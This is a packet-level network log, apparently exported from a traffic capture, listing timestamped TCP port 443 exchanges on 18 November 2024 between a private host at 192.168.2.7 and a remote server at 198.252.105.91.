                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:24.637481928 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:24.637481928 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:24.637504101 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:24.641525030 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:24.871849060 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:24.871865988 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:24.871889114 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:24.871962070 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:24.871987104 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:24.872031927 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:24.872343063 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.029448032 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.029483080 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.029553890 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.029586077 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.029634953 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.029897928 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.243622065 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.243639946 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.243664980 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.243729115 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.243753910 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.243773937 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.243793964 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.360882998 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.360918999 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.360960007 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.360975981 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.361020088 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.361038923 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.532810926 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.532845020 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.532906055 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.532926083 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.532962084 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.532996893 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.650052071 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.650085926 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.650144100 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.650154114 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.650192976 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.650213957 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.917037010 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.917056084 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.917079926 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.917201996 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.917222977 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.917289019 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.946475983 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.946504116 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.946604013 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.946628094 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:25.946676016 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:26.127966881 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.418776989 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.418807030 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.418926954 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.418943882 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.418993950 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.565778971 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.565809011 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.565957069 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.565988064 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.566039085 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.770382881 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.770418882 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.770529032 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.770544052 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.770627022 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.887197971 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.887228966 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.887377024 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.887398005 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:28.887449026 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.035414934 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.035448074 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.035589933 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.035608053 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.035655022 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.199254036 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.199278116 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.199374914 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.199408054 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.199455976 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.316304922 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.316333055 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.316425085 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.316437006 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.316483974 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.536156893 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.536192894 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.536365032 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.536398888 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.536451101 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.598076105 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.598141909 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.598227024 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.598254919 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.598274946 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.598311901 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.831285000 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.831325054 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.831384897 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.831407070 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.831423044 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.831449986 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.949517012 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.949544907 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.949737072 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:29.949770927 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:31.992382050 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.109520912 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.109554052 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.109669924 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.109669924 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.109693050 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.109745979 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.226463079 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.226490021 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.226584911 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.226618052 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.226748943 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.343569994 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.343597889 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.343769073 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.343811989 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.343858957 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.460864067 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.460932970 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.461040020 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.461076975 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.461097956 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.461131096 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.577969074 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.577996016 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.578126907 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.578160048 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.578207970 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.694854021 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.694927931 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.695101023 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.695122957 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.695192099 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.811990976 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.812057018 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.812189102 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.812222004 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.812247992 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:32.812268019 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.046520948 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.046541929 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.046588898 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.046714067 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.046747923 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.046765089 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.046818018 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.079955101 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.079976082 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.080034971 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.080069065 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.080095053 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.080111980 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.092308044 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.092324972 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.092400074 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:33.092426062 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.969666004 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.969686985 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.969705105 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:34.969727993 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.086704016 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.086739063 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.086791992 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.086817026 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.086843014 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.086859941 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.276891947 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.276923895 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.277021885 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.277049065 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.277091026 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.471961975 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.472004890 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.472126007 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.472145081 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.472194910 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.557539940 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.557605982 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.557651043 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.557665110 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.557701111 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.557723045 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.791814089 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.791872025 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.791939020 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.791954041 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.791992903 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:35.792006016 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.003717899 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.003761053 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.003875971 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.003887892 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.003912926 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.003938913 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.294306040 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.294322968 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.294362068 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.294428110 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.294446945 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.294472933 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.294497967 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.378539085 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.378563881 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.378659010 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.378686905 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.378695011 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.378806114 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.612837076 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.612869024 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.612905979 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.612998962 CET49700443192.168.2.7198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:36.613018036 CET44349700198.252.105.91192.168.2.7
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:39.130003929 CET44349700198.252.105.91192.168.2.7
